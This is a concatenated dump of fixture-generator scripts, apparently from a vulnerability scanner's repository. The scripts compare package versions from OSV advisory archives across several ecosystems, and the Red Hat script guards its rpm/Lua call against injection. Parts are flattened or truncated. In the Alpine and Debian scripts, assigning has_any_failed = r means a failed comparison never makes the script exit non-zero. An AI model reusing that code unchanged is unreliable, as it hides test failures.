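  public static void writeToFile(String outfile, List<String> lines) throws IOException {
    try(PrintWriter writer = new PrintWriter(outfile, StandardCharsets.UTF_8)) {
      lines.forEach(writer::println);
    }
  }

  /**
   * Evaluates "version1 op version2" using the native Maven comparator.
   *
   * @param op one of "=", "&lt;" or "&gt;"
   * @throws RuntimeException if op is anything else
   */
  public static boolean compareVers(String version1, String op, String version2) {
    ComparableVersion v1 = new ComparableVersion(version1);
    ComparableVersion v2 = new ComparableVersion(version2);

    int r = v1.compareTo(v2);

    switch(op) {
      case "=":
        return r == 0;
      case "<":
        return r < 0;
      case ">":
        return r > 0;
      default:
        throw new RuntimeException("unsupported comparison operator " + op);
    }
  }

  /**
   * Checks each "v1 op v2" line against the native comparator and prints the
   * outcome, filtered by select ("failures", "successes", or anything else for
   * all). Blank and commented lines are skipped; a commented line that is a
   * known unsupported comparison is printed with an "S" marker.
   *
   * @return true if any comparison did not hold
   */
  public static boolean compareVersions(List<String> lines, String select) {
    boolean didAnyFail = false;

    for(String line : lines) {
      line = line.trim();

      if(line.isEmpty() || line.startsWith("#") || line.startsWith("//")) {
        String maybeUnsupported = uncomment(line).trim();

        if(isUnsupportedComparison(maybeUnsupported)) {
          System.out.printf("\033[96mS\033[0m: \033[93m%s\033[0m\n", maybeUnsupported);
        }
        continue;
      }

      String[] parts = line.split(" ");

      // fail with the offending line instead of an index error
      if(parts.length != 3) {
        throw new RuntimeException("malformed comparison line: " + line);
      }

      boolean r = compareVers(parts[0], parts[1], parts[2]);

      if(!r) {
        didAnyFail = true;
      }

      if(select.equals("failures") && r) {
        continue;
      }

      if(select.equals("successes") && !r) {
        continue;
      }

      String color = r ? "\033[92m" : "\033[91m";
      String rs = r ? "T" : "F";

      System.out.printf("%s%s\033[0m: \033[93m%s\033[0m\n", color, rs, line);
    }

    return didAnyFail;
  }

  /** Runs {@link #compareVersions} over the lines of the given file. */
  public static boolean compareVersionsInFile(String filepath, String select) throws IOException {
    List<String> lines = new ArrayList<>();

    // read with the same charset writeToFile uses, not the platform default
    try(BufferedReader br = new BufferedReader(new FileReader(filepath, StandardCharsets.UTF_8))) {
      String line;
      while((line = br.readLine()) != null) {
        lines.add(line);
      }
    }

    return compareVersions(lines, select);
  }

  /**
   * Builds one comparison line per pair of neighbouring versions in the given
   * sorted list; known unsupported comparisons are emitted commented out.
   */
  public static List<String> generateVersionCompares(List<String> versions) {
    return IntStream.range(1, versions.size()).mapToObj(i -> {
      String currentVersion = versions.get(i);
      String previousVersion = versions.get(i - 1);
      String op = compareVers(currentVersion, "=", previousVersion) ? "=" : "<";

      String comparison = String.format("%s %s %s", previousVersion, op, currentVersion);

      if(isUnsupportedComparison(comparison)) {
        comparison = "# " + comparison;
      }

      return comparison;
    }).collect(Collectors.toList());
  }

  /** Builds the distinct comparison lines for every package's versions. */
  public static List<String> generatePackageCompares(Map<String, List<String>> packages) {
    return packages
      .values()
      .stream()
      .map(GenerateMavenVersions::generateVersionCompares)
      .flatMap(Collection::stream)
      .distinct()
      .collect(Collectors.toList());
  }

  public static String getSelectFilter() {
    // set this to either "failures" or "successes" to only have those comparison results
    // printed; setting it to anything else will have all comparison results printed
    String value = System.getenv("VERSION_GENERATOR_PRINT");

    if(value == null) {
      return "failures";
    }

    return value;
  }

  /**
   * Regenerates the fixture file, then re-checks every line in it; exits with
   * status 1 if any comparison did not hold.
   */
  public static void main(String[] args) throws IOException {
    String outfile = "internal/semantic/testdata/maven-versions-generated.txt";
    Map<String, List<String>> packages = fetchPackageVersions();

    writeToFile(outfile, generatePackageCompares(packages));

    String show = getSelectFilter();

    boolean didAnyFail = compareVersionsInFile(outfile, show);

    if(didAnyFail) {
      System.exit(1);
    }
  }
}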
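def extract_packages_with_versions(osvs):
  """Collects the versions listed for each Alpine package in the given records.

  Affected entries without a package, or whose ecosystem does not start with
  "Alpine", are skipped. Records without an "affected" list contribute nothing.

  Returns a dict mapping package name to its deduplicated, sorted list of
  AlpineVersion objects; a package that lists no versions maps to [].
  """
  # named `packages` so the builtin `dict` stays usable below
  packages = {}

  for osv in osvs:
    # "affected" is not guaranteed to be present on every record
    for affected in osv.get('affected', []):
      if 'package' not in affected or not affected['package']['ecosystem'].startswith('Alpine'):
        continue

      name = affected['package']['name']
      versions = packages.setdefault(name, [])
      versions.extend(AlpineVersion(version) for version in affected.get('versions', []))

  # deduplicate and sort the versions for each package
  for name in packages:
    packages[name] = sorted(dict.fromkeys(packages[name]))

  return packages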
""" if self._docker_container is not None: return container_name = f'alpine-{self._alpine_version}-container' cmd = ['docker', 'run', '--rm', '--name', container_name, '-d', f'alpine:{self._alpine_version}', 'tail', '-f', '/dev/null'] out = subprocess.run(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE) if out.returncode != 0: raise Exception(f'failed to start {container_name} container: {out.stderr.decode("utf-8")}') self._docker_container = container_name atexit.register(self._stop_docker_container) def _stop_docker_container(self): if self._docker_container is None: raise Exception(f'called to stop docker container when none was started') cmd = ['docker', 'stop', '-t', '0', self._docker_container] out = subprocess.run(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE) if out.returncode != 0: raise Exception(f'failed to stop {self._docker_container} container: {out.stderr.decode("utf-8")}') def _load_cache(self): if self.cache_path: self.cache_path.touch() with open(self.cache_path, 'r') as f: lines = f.readlines() for line in lines: line = line.strip() key, result = line.split(',') if result == 'True': self.cache[key] = True continue if result == 'False': self.cache[key] = False continue print(f"ignoring invalid cache entry '{line}'") def _save_to_cache(self, key, result): self.cache[key] = result if self.cache_path: self.cache_path.touch() with open(self.cache_path, 'a') as f: f.write(f'{key},{result}\n') def _compare_command(self, a, b): if self._compare_method == 'run': return ['docker', 'run', '--rm', f'alpine:{self._alpine_version}', 'apk', 'version', '-t', a, b] self._start_docker_container() return ['docker', 'exec', self._docker_container, 'apk', 'version', '-t', a, b] def compare(self, a, op, b): key = f'{a} {op} {b}' if key in self.cache: return self.cache[key] out = subprocess.run(self._compare_command(a, b), stdout=subprocess.PIPE, stderr=subprocess.PIPE) if out.returncode != 0: raise Exception(f'apk did not like comparing {a} {op} {b}: 
{out.stderr.decode("utf-8")}') r = out.stdout.decode('utf-8').strip() == op self._save_to_cache(key, r) return r alpine_comparer = AlpineVersionComparer('/tmp/alpine-versions-generator-cache.csv', 'exec') class AlpineVersion: def __str__(self): return self.version def __hash__(self): return hash(self.version) def __init__(self, version): self.version = version def __lt__(self, other): return alpine_comparer.compare(self.version, '<', other.version) def __gt__(self, other): return alpine_comparer.compare(self.version, '>', other.version) def __eq__(self, other): return alpine_comparer.compare(self.version, '=', other.version) def compare(v1, relate, v2): ops = {'<': operator.lt, '=': operator.eq, '>': operator.gt} return ops[relate](v1, v2) def compare_versions(lines, select='all'): has_any_failed = False for line in lines: line = line.strip() if line == '' or line.startswith('#') or line.startswith('//'): maybe_unsupported = uncomment(line).strip() if is_unsupported_comparison(maybe_unsupported): print(f'\033[96mS\033[0m: \033[93m{maybe_unsupported}\033[0m') continue v1, op, v2 = line.strip().split(' ') r = compare(AlpineVersion(v1), op, AlpineVersion(v2)) if not r: has_any_failed = r if select == 'failures' and r: continue if select == 'successes' and not r: continue color = '\033[92m' if r else '\033[91m' rs = 'T' if r else 'F' print(f'{color}{rs}\033[0m: \033[93m{line}\033[0m') return has_any_failed def compare_versions_in_file(filepath, select='all'): with open(filepath) as f: lines = f.readlines() return compare_versions(lines, select) def generate_version_compares(versions): comparisons = [] for i, version in enumerate(versions): if i == 0: continue comparison = f'{versions[i - 1]} < {version}\n' if is_unsupported_comparison(comparison.strip()): comparison = '# ' + comparison comparisons.append(comparison) return comparisons def generate_package_compares(packages): comparisons = [] for package in packages: versions = packages[package] 
comparisons.extend(generate_version_compares(versions)) # return comparisons return list(dict.fromkeys(comparisons)) def fetch_packages_versions(): download_alpine_db() osvs = [] with zipfile.ZipFile('alpine-db.zip') as db: for fname in db.namelist(): with db.open(fname) as osv: osvs.append(json.loads(osv.read().decode('utf-8'))) return extract_packages_with_versions(osvs) outfile = 'internal/semantic/testdata/alpine-versions-generated.txt' packs = fetch_packages_versions() with open(outfile, 'w') as f: f.writelines(generate_package_compares(packs)) f.write('\n') # set this to either "failures" or "successes" to only have those comparison results # printed; setting it to anything else will have all comparison results printed show = os.environ.get('VERSION_GENERATOR_PRINT', 'failures') did_any_fail = compare_versions_in_file(outfile, show) if did_any_fail: sys.exit(1) ================================================ FILE: scripts/generators/generate-cran-versions.R ================================================ #!/usr/bin/env Rscript install.packages("jsonlite", repos = 'https://cran.r-project.org') library(utils) library(jsonlite) # An array of version comparisons that are known to be unsupported and so # should be commented out in the generated fixture. # # Generally this is because the native implementation has a suspected bug # that causes the comparison to return incorrect results, and so supporting # such comparisons in the detector would in fact be wrong. 
UNSUPPORTED_COMPARISONS <- c() download_cran_db <- function() { url <- "https://osv-vulnerabilities.storage.googleapis.com/CRAN/all.zip" dest <- "cran-db.zip" download.file(url, dest, method = "auto") } extract_packages_with_versions <- function(osvs) { result <- list() for (osv in osvs) { for (affected in osv$affected) { if (is.null(affected["package"]) || affected$package$ecosystem != "CRAN") { next } package <- affected$package$name if (!(package %in% names(result))) { result[[package]] <- list() } for (version in affected$versions) { tryCatch( { as.package_version(version) result[[package]] <- c(result[[package]], version) }, error = function(e) { cat(sprintf("skipping invalid version %s for %s\n", version, package)) } ) } } } # deduplicate and sort the versions for each package for (package in names(result)) { result[[package]] <- sort(numeric_version(unique(result[[package]]))) } return(result) } is_unsupported_comparison <- function(line) { line %in% UNSUPPORTED_COMPARISONS } uncomment <- function(line) { if (startsWith(line, "#")) { return(substr(line, 2, nchar(line))) } if (startsWith(line, "//")) { return(substr(line, 3, nchar(line))) } return(line) } compare <- function(v1, relate, v2) { ops <- list('<' = function(result) result < 0, '=' = function(result) result == 0, '>' = function(result) result > 0) return(ops[[relate]](compareVersion(v1, v2))) } compare_versions <- function(lines, select="all") { has_any_failed <- FALSE for (line in lines) { line <- trimws(line) if (line == "" || grepl("^#", line) || grepl("^//", line)) { maybe_unsupported <- trimws(uncomment(line)) if (is_unsupported_comparison(maybe_unsupported)) { cat(sprintf("\033[96mS\033[0m: \033[93m%s\033[0m\n", maybe_unsupported)) } next } parts <- strsplit(trimws(line), " ")[[1]] v1 <- parts[1] op <- parts[2] v2 <- parts[3] r <- compare(v1, op, v2) if (!r) { has_any_failed <- TRUE } if (select == "failures" && r) { next } if (select == "successes" && !r) { next } color <- ifelse(r, 
'\033[92m', '\033[91m') rs <- ifelse(r, "T", "F") cat(sprintf("%s%s\033[0m: \033[93m%s\033[0m\n", color, rs, line)) } return(has_any_failed) } compare_versions_in_file <- function(filepath, select="all") { lines <- readLines(filepath) return(compare_versions(lines, select)) } generate_version_compares <- function(versions) { comparisons <- character() for (i in seq_along(versions)) { if (i == 1) { next } comparison <- sprintf("%s < %s", versions[i - 1], versions[i]) if (is_unsupported_comparison(trimws(comparison))) { comparison <- paste("#", comparison) } comparisons <- c(comparisons, comparison) } return(comparisons) } generate_package_compares <- function(packages) { comparisons <- character() for (package in names(packages)) { versions <- packages[[package]] comparisons <- c(comparisons, generate_version_compares(versions)) } # return unique comparisons return(unique(comparisons)) } fetch_packages_versions <- function() { download_cran_db() osvs <- list() with_zip <- unzip("cran-db.zip", list = TRUE) for (fname in with_zip$Name) { osv <- jsonlite::fromJSON(unzip("cran-db.zip", files = fname, exdir = tempdir()), simplifyDataFrame = FALSE) osvs <- c(osvs, list(osv)) } return(extract_packages_with_versions(osvs)) } outfile <- "internal/semantic/testdata/cran-versions-generated.txt" packs <- fetch_packages_versions() writeLines(generate_package_compares(packs), outfile, sep = "\n") cat("\n") # set this to either "failures" or "successes" to only have those comparison results # printed; setting it to anything else will have all comparison results printed show <- Sys.getenv("VERSION_GENERATOR_PRINT", "failures") did_any_fail <- compare_versions_in_file(outfile, show) if (did_any_fail) { q(status = 1) } ================================================ FILE: scripts/generators/generate-debian-versions.py ================================================ #!/usr/bin/env python3 import json import operator import os import subprocess import sys import urllib.request import 
zipfile from pathlib import Path # this requires being run on an OS that has a version of "dpkg" which supports the # "--compare-versions" option; also make sure to consider the version of dpkg being # used in case there are changes to the comparing logic (last run with 1.19.7). # # also note that because of the large amount of versions being used there is # significant overhead in having to use a subprocess, so this generator caches # the results of said subprocess calls; a typical no-cache run takes about 5+ # minutes whereas with the cache it only takes seconds. # An array of version comparisons that are known to be unsupported and so # should be commented out in the generated fixture. # # Generally this is because the native implementation has a suspected bug # that causes the comparison to return incorrect results, and so supporting # such comparisons in the detector would in fact be wrong. UNSUPPORTED_COMPARISONS = [] def is_unsupported_comparison(line): return line in UNSUPPORTED_COMPARISONS def uncomment(line): if line.startswith('#'): return line[1:] if line.startswith('//'): return line[2:] return line def download_debian_db(): urllib.request.urlretrieve('https://osv-vulnerabilities.storage.googleapis.com/Debian/all.zip', 'debian-db.zip') def extract_packages_with_versions(osvs): dict = {} for osv in osvs: for affected in osv['affected']: if 'package' not in affected or not affected['package']['ecosystem'].startswith('Debian'): continue package = affected['package']['name'] if package not in dict: dict[package] = [] for version in affected.get('versions', []): dict[package].append(DebianVersion(version)) # deduplicate and sort the versions for each package for package in dict: dict[package] = sorted(list(dict.fromkeys(dict[package]))) return dict class DebianVersionComparer: def __init__(self, cache_path): self.cache_path = Path(cache_path) self.cache = {} self._load_cache() def _load_cache(self): if self.cache_path: self.cache_path.touch() with 
open(self.cache_path, 'r') as f: lines = f.readlines() for line in lines: line = line.strip() key, result = line.split(',') if result == 'True': self.cache[key] = True continue if result == 'False': self.cache[key] = False continue print(f"ignoring invalid cache entry '{line}'") def _save_to_cache(self, key, result): self.cache[key] = result if self.cache_path: self.cache_path.touch() with open(self.cache_path, 'a') as f: f.write(f'{key},{result}\n') def compare(self, a, op, b): key = f'{a} {op} {b}' if key in self.cache: return self.cache[key] cmd = ['dpkg', '--compare-versions', a, op, b] out = subprocess.run(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE) if out.stdout: print(out.stdout.decode('utf-8')) if out.stderr: print(out.stderr.decode('utf-8')) r = out.returncode == 0 self._save_to_cache(key, r) return r debian_comparer = DebianVersionComparer('/tmp/debian-versions-generator-cache.csv') class DebianVersion: def __str__(self): return self.version def __hash__(self): return hash(self.version) def __init__(self, version): self.version = version def __lt__(self, other): return debian_comparer.compare(self.version, 'lt', other.version) def __gt__(self, other): return debian_comparer.compare(self.version, 'gt', other.version) def __eq__(self, other): return debian_comparer.compare(self.version, 'eq', other.version) def compare(v1, relate, v2): ops = {'<': operator.lt, '=': operator.eq, '>': operator.gt} return ops[relate](v1, v2) def compare_versions(lines, select='all'): has_any_failed = False for line in lines: line = line.strip() if line == '' or line.startswith('#') or line.startswith('//'): maybe_unsupported = uncomment(line).strip() if is_unsupported_comparison(maybe_unsupported): print(f'\033[96mS\033[0m: \033[93m{maybe_unsupported}\033[0m') continue v1, op, v2 = line.strip().split(' ') r = compare(DebianVersion(v1), op, DebianVersion(v2)) if not r: has_any_failed = r if select == 'failures' and r: continue if select == 'successes' and not r: 
continue color = '\033[92m' if r else '\033[91m' rs = 'T' if r else 'F' print(f'{color}{rs}\033[0m: \033[93m{line}\033[0m') return has_any_failed def compare_versions_in_file(filepath, select='all'): with open(filepath) as f: lines = f.readlines() return compare_versions(lines, select) def generate_version_compares(versions): comparisons = [] for i, version in enumerate(versions): if i == 0: continue comparison = f'{versions[i - 1]} < {version}\n' if is_unsupported_comparison(comparison.strip()): comparison = '# ' + comparison comparisons.append(comparison) return comparisons def generate_package_compares(packages): comparisons = [] for package in packages: versions = packages[package] comparisons.extend(generate_version_compares(versions)) # return comparisons return list(dict.fromkeys(comparisons)) def fetch_packages_versions(): download_debian_db() osvs = [] with zipfile.ZipFile('debian-db.zip') as db: for fname in db.namelist(): with db.open(fname) as osv: osvs.append(json.loads(osv.read().decode('utf-8'))) return extract_packages_with_versions(osvs) outfile = 'internal/semantic/testdata/debian-versions-generated.txt' packs = fetch_packages_versions() with open(outfile, 'w') as f: f.writelines(generate_package_compares(packs)) f.write('\n') # set this to either "failures" or "successes" to only have those comparison results # printed; setting it to anything else will have all comparison results printed show = os.environ.get('VERSION_GENERATOR_PRINT', 'failures') did_any_fail = compare_versions_in_file(outfile, show) if did_any_fail: sys.exit(1) ================================================ FILE: scripts/generators/generate-packagist-versions.php ================================================ open($path, ZipArchive::RDONLY) === false) { throw new RuntimeException('failed to read zip archive'); } return $zip; } /** * @throws JsonException * @throws RuntimeException */ function fetchPackageVersions(): array { $dbPath = downloadPackagistDb(); $dbZip = 
openDbZip($dbPath); $osvs = []; for ($i = 0; $i < $dbZip->numFiles; $i++) { $file = $dbZip->getFromIndex($i); if ($file === false) { throw new RuntimeException('failed to read a file from db zip'); } $osvs[] = json_decode($file, true, 512, JSON_THROW_ON_ERROR); } $packages = []; foreach ($osvs as $osv) { foreach ($osv['affected'] as $affected) { if (!isset($affected['package']) || $affected['package']['ecosystem'] !== 'Packagist') { continue; } $package = $affected['package']['name']; if (!isset($packages[$package])) { $packages[$package] = []; } if (empty($affected['versions'])) { continue; } foreach ($affected['versions'] as $version) { $packages[$package][] = $version; } } } return array_map(static function ($versions) { $uniq = array_unique($versions); usort($uniq, static fn($a, $b) => version_compare(ltrim($a, "vV"), ltrim($b, "vV"))); return $uniq; }, $packages); } /** * Normalizes the previous version such that it will compare "correctly" to the current version, * by ensuring that they both have the same "v" prefix (or lack of). * * Whether the "v" prefix is present on the normalized previous version depends on * its presences in the current version; this ensure we will have _some_ versions that * do have the "v" prefix, rather than it being present on _none_ or _all_ versions. 
* * @param string $currentVersion * @param string $previousVersion * * @return string */ function normalizePrevVersion(string $currentVersion, string $previousVersion): string { if (str_starts_with($currentVersion, "v")) { $previousVersion = ltrim($previousVersion, "vV"); return "v$previousVersion"; } if (str_starts_with($currentVersion, "V")) { $previousVersion = ltrim($previousVersion, "vV"); return "V$previousVersion"; } return ltrim($previousVersion, "vV"); } function generateVersionCompares(array $versions): array { $comparisons = []; foreach ($versions as $index => $version) { if ($index === 0) { continue; } $prevVersion = normalizePrevVersion($version, $versions[$index - 1]); $op = version_compare($prevVersion, $version) === 0 ? "=" : "<"; $comparison = "$prevVersion $op $version"; if (isUnsupportedComparison($comparison)) { $comparison = "# $comparison"; } $comparisons[] = $comparison; } return $comparisons; } function generatePackageCompares(array $packages): array { $comparisons = []; foreach ($packages as $versions) { $comparisons[] = generateVersionCompares($versions); } return array_merge(...$comparisons); } function compareVersions(array $lines, string $select = "all"): bool { $hasAnyFailed = false; foreach ($lines as $line) { $line = trim($line); if (empty($line) || str_starts_with($line, "#") || str_starts_with($line, "//")) { $maybeUnsupported = trim(uncomment($line)); if (isUnsupportedComparison($maybeUnsupported)) { echo "\033[96mS\033[0m: \033[93m$maybeUnsupported\033[0m\n"; } continue; } [$v1, $op, $v2] = explode(" ", $line); $r = version_compare($v1, $v2, $op); if (!$r) { $hasAnyFailed = true; } if ($select === "failures" && $r === true) { continue; } if ($select === "successes" && $r !== true) { continue; } $color = $r ? "\033[92m" : "\033[91m"; $rs = $r ? 
"T" : "F"; echo "$color$rs\033[0m: \033[93m$line\033[0m\n"; } return $hasAnyFailed; } $outfile = "internal/semantic/testdata/packagist-versions-generated.txt"; /** @noinspection PhpUnhandledExceptionInspection */ $packages = fetchPackageVersions(); file_put_contents($outfile, implode("\n", array_unique(generatePackageCompares($packages))) . "\n"); // set this to either "failures" or "successes" to only have those comparison results // printed; setting it to anything else will have all comparison results printed $show = getenv("VERSION_GENERATOR_PRINT") ?: "failures"; $didAnyFail = compareVersions(explode("\n", file_get_contents($outfile)), $show); if ($didAnyFail === true) { exit(1); } ================================================ FILE: scripts/generators/generate-pypi-versions.py ================================================ #!/usr/bin/env python3 import json import operator import os import packaging.version import sys import urllib.request import zipfile # this requires you run "pip install packaging" - have to be careful about versions too # because of the "legacy version" stuff # An array of version comparisons that are known to be unsupported and so # should be commented out in the generated fixture. # # Generally this is because the native implementation has a suspected bug # that causes the comparison to return incorrect results, and so supporting # such comparisons in the detector would in fact be wrong. 
UNSUPPORTED_COMPARISONS = [] def is_unsupported_comparison(line): return line in UNSUPPORTED_COMPARISONS def uncomment(line): if line.startswith('#'): return line[1:] if line.startswith('//'): return line[2:] return line def download_pypi_db(): urllib.request.urlretrieve('https://osv-vulnerabilities.storage.googleapis.com/PyPI/all.zip', 'pypi-db.zip') def extract_packages_with_versions(osvs): dict = {} for osv in osvs: for affected in osv['affected']: if 'package' not in affected or affected['package']['ecosystem'] != 'PyPI': continue package = affected['package']['name'] if package not in dict: dict[package] = [] for version in affected.get('versions', []): try: dict[package].append(packaging.version.parse(version)) except packaging.version.InvalidVersion: print(f'skipping invalid version {version} for {package}') # deduplicate and sort the versions for each package for package in dict: dict[package] = sorted(list(dict.fromkeys(dict[package]))) return dict def compare(v1, relate, v2): ops = {'<': operator.lt, '=': operator.eq, '>': operator.gt} return ops[relate](v1, v2) def compare_versions(lines, select='all'): has_any_failed = False for line in lines: line = line.strip() if line == '' or line.startswith('#') or line.startswith('//'): maybe_unsupported = uncomment(line).strip() if is_unsupported_comparison(maybe_unsupported): print(f'\033[96mS\033[0m: \033[93m{maybe_unsupported}\033[0m') continue v1, op, v2 = line.strip().split(' ') r = compare(packaging.version.parse(v1), op, packaging.version.parse(v2)) if not r: has_any_failed = True if select == 'failures' and r: continue if select == 'successes' and not r: continue color = '\033[92m' if r else '\033[91m' rs = 'T' if r else 'F' print(f'{color}{rs}\033[0m: \033[93m{line}\033[0m') return has_any_failed def compare_versions_in_file(filepath, select='all'): with open(filepath) as f: lines = f.readlines() return compare_versions(lines, select) def generate_version_compares(versions): comparisons = [] for i, 
version in enumerate(versions): if i == 0: continue comparison = f'{versions[i - 1]} < {version}\n' if is_unsupported_comparison(comparison.strip()): comparison = '# ' + comparison comparisons.append(comparison) return comparisons def generate_package_compares(packages): comparisons = [] for package in packages: versions = packages[package] comparisons.extend(generate_version_compares(versions)) # return comparisons return list(dict.fromkeys(comparisons)) def fetch_packages_versions(): download_pypi_db() osvs = [] with zipfile.ZipFile('pypi-db.zip') as db: for fname in db.namelist(): with db.open(fname) as osv: osvs.append(json.loads(osv.read().decode('utf-8'))) return extract_packages_with_versions(osvs) outfile = 'internal/semantic/testdata/pypi-versions-generated.txt' packs = fetch_packages_versions() with open(outfile, 'w') as f: f.writelines(generate_package_compares(packs)) f.write('\n') # set this to either "failures" or "successes" to only have those comparison results # printed; setting it to anything else will have all comparison results printed show = os.environ.get('VERSION_GENERATOR_PRINT', 'failures') did_any_fail = compare_versions_in_file(outfile, show) if did_any_fail: sys.exit(1) ================================================ FILE: scripts/generators/generate-redhat-versions.py ================================================ #!/usr/bin/env python3 import json import operator import os import subprocess import sys import urllib.request import zipfile from pathlib import Path # this requires being run on an OS that has a version of "rpm" installed which # supports evaluating Lua expressions (most versions do); also make sure to consider # the version of rpm being used in case there are changes to the comparing logic # (last run with 1.19.7). # # note that both alpine and debian have a "rpm" package that supports this, which # can be installed using "apk add rpm" and "apt install rpm" respectively. 
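#
# also note that because of the large amount of versions being used there is
# significant overhead in having to use a subprocess, so this generator caches
# the results of said subprocess calls; a typical no-cache run takes about 5+
# minutes whereas with the cache it only takes seconds.

# An array of version comparisons that are known to be unsupported and so
# should be commented out in the generated fixture.
#
# Generally this is because the native implementation has a suspected bug
# that causes the comparison to return incorrect results, and so supporting
# such comparisons in the detector would in fact be wrong.
UNSUPPORTED_COMPARISONS = []

# Characters accepted in a version before it is placed inside the Lua snippet
# that rpm evaluates. Extend this only after confirming the advisory database
# legitimately uses the extra character.
_SAFE_VERSION_CHARS = frozenset(
  'abcdefghijklmnopqrstuvwxyz'
  'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
  '0123456789'
  '._+~^:-'
)


def _require_safe_version(value):
  """
  Raises ValueError unless `value` is a string made only of allowlisted characters.

  The versions come from a downloaded advisory archive and are interpolated
  into a Lua string literal inside an rpm macro; a quote, backslash, brace,
  percent sign or newline would end the literal or the macro and let the data
  be evaluated as code, so such values are refused instead of escaped.
  """
  if not isinstance(value, str) or not all(ch in _SAFE_VERSION_CHARS for ch in value):
    raise ValueError(f'refusing to pass unexpected version string to rpm: {value!r}')


def is_unsupported_comparison(line):
  """Returns True if `line` is listed in UNSUPPORTED_COMPARISONS."""
  return line in UNSUPPORTED_COMPARISONS


def uncomment(line):
  """Strips a single leading '#' or '//' comment marker from `line`, if present."""
  if line.startswith('#'):
    return line[1:]
  if line.startswith('//'):
    return line[2:]
  return line


def download_redhat_db():
  """Downloads the OSV Red Hat advisory archive to `redhat-db.zip` in the working directory."""
  urllib.request.urlretrieve('https://osv-vulnerabilities.storage.googleapis.com/Red%20Hat/all.zip', 'redhat-db.zip')


def extract_packages_with_versions(osvs):
  """
  Builds a mapping of package name to its sorted, de-duplicated versions.

  Uses the `versions` list plus the `introduced` (other than '0') and `fixed`
  events of every range, for `affected` entries whose ecosystem starts with
  "Red Hat". Sorting goes through RedHatVersion, so it invokes rpm (or the cache).
  """
  # named `packages` rather than `dict` so the builtin is not shadowed
  packages = {}

  # advisories without an "affected" list are skipped rather than raising KeyError
  for osv in osvs:
    for affected in osv.get('affected', []):
      if 'package' not in affected or not affected['package']['ecosystem'].startswith('Red Hat'):
        continue

      package = affected['package']['name']

      if package not in packages:
        packages[package] = []

      for version in affected.get('versions', []):
        packages[package].append(RedHatVersion(version))

      for rang in affected.get('ranges', []):
        for event in rang['events']:
          if 'introduced' in event and event['introduced'] != '0':
            packages[package].append(RedHatVersion(event['introduced']))
          if 'fixed' in event:
            packages[package].append(RedHatVersion(event['fixed']))

  # deduplicate and sort the versions for each package
  for package in packages:
    packages[package] = sorted(list(dict.fromkeys(packages[package])))

  return packages


class RedHatVersionComparer:
  """Compares RPM versions by evaluating a Lua expression with `rpm --eval`, caching results on disk."""

  def __init__(self, cache_path):
    """
    :param cache_path: file that holds one `<a> <op> <b>,<True|False>` entry per line
    """
    self.cache_path = Path(cache_path)
    self.cache = {}

    self._load_cache()

  def _load_cache(self):
    """Reads the cache file into `self.cache`, creating the file if it is missing."""
    if self.cache_path:
      self.cache_path.touch()
      with open(self.cache_path, 'r') as f:
        lines = f.readlines()

      for line in lines:
        line = line.strip()

        # a blank line is not an entry and must not abort the whole load
        if line == '':
          continue

        # split on the LAST comma so a key containing commas still parses
        key, sep, result = line.rpartition(',')

        if sep and result == 'True':
          self.cache[key] = True
          continue
        if sep and result == 'False':
          self.cache[key] = False
          continue

        print(f"ignoring invalid cache entry '{line}'")

  def _save_to_cache(self, key, result):
    """Records `result` for `key` in memory and appends it to the cache file."""
    self.cache[key] = result
    if self.cache_path:
      self.cache_path.touch()
      with open(self.cache_path, 'a') as f:
        f.write(f'{key},{result}\n')

  def _compare1(self, a, op, b):
    """
    Returns True if `rpm.vercmp(a, b)` matches `op` ('=', '>' or '<').

    Raises ValueError for a version outside the allowlist, and Exception if
    rpm exits non-zero or writes to stderr.
    """
    # validate before interpolation: the values end up inside evaluated Lua
    _require_safe_version(a)
    _require_safe_version(b)

    cmd = ['rpm', '--eval', f'%{{lua:print(rpm.vercmp("{a}", "{b}"))}}']
    out = subprocess.run(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)

    if out.returncode != 0 or out.stderr:
      raise Exception(f'rpm did not like comparing {a} {op} {b}: {out.stderr.decode("utf-8")}')

    r = out.stdout.decode('utf-8').strip()

    if r == '0' and op == '=':
      return True
    elif r == '1' and op == '>':
      return True
    elif r == '-1' and op == '<':
      return True

    return False

  def _compare2(self, a, op, b):
    """
    Returns the result of `rpm.ver(a) <op> rpm.ver(b)` as a bool.

    Raises ValueError for an operator or version outside the allowlist, and
    Exception if rpm fails or prints anything other than 'True' or 'False'.
    """
    if op == '=':
      op = '=='  # lua uses == for equality

    # the operator is interpolated into the Lua expression as well
    if op not in ('<', '>', '=='):
      raise ValueError(f'unsupported comparison operator: {op!r}')
    _require_safe_version(a)
    _require_safe_version(b)

    cmd = ['rpm', '--eval', f'%{{lua:print(rpm.ver("{a}") {op} rpm.ver("{b}"))}}']
    out = subprocess.run(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)

    if out.returncode != 0 or out.stderr:
      raise Exception(f'rpm did not like comparing {a} {op} {b}: {out.stderr.decode("utf-8")}')

    r = out.stdout.decode('utf-8').strip()

    if r == 'True':
      return True
    elif r == 'False':
      return False

    raise Exception(f'unexpected result from rpm: {r}')

  def compare(self, a, op, b):
    """Returns the cached result for `a op b`, or asks rpm and stores the answer."""
    key = f'{a} {op} {b}'
    if key in self.cache:
      return self.cache[key]

    r = self._compare1(a, op, b)
    # r = self._compare2(a, op, b)

    self._save_to_cache(key, r)
    return r


# NOTE(review): fixed, predictable file name in a shared directory whose entries
# are trusted as comparison results; prefer a per-user cache directory when this
# runs on a host shared with other accounts.
redhat_comparer = RedHatVersionComparer('/tmp/redhat-versions-generator-cache.csv')


class RedHatVersion:
  def __str__(self):
    return self.version

  def __hash__(self):
    return hash(self.version)

  def __init__(self, version):
    self.version = version

  def __lt__(self, other):
    return redhat_comparer.compare(self.version, '<', other.version)

  def __gt__(self, other):
    return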
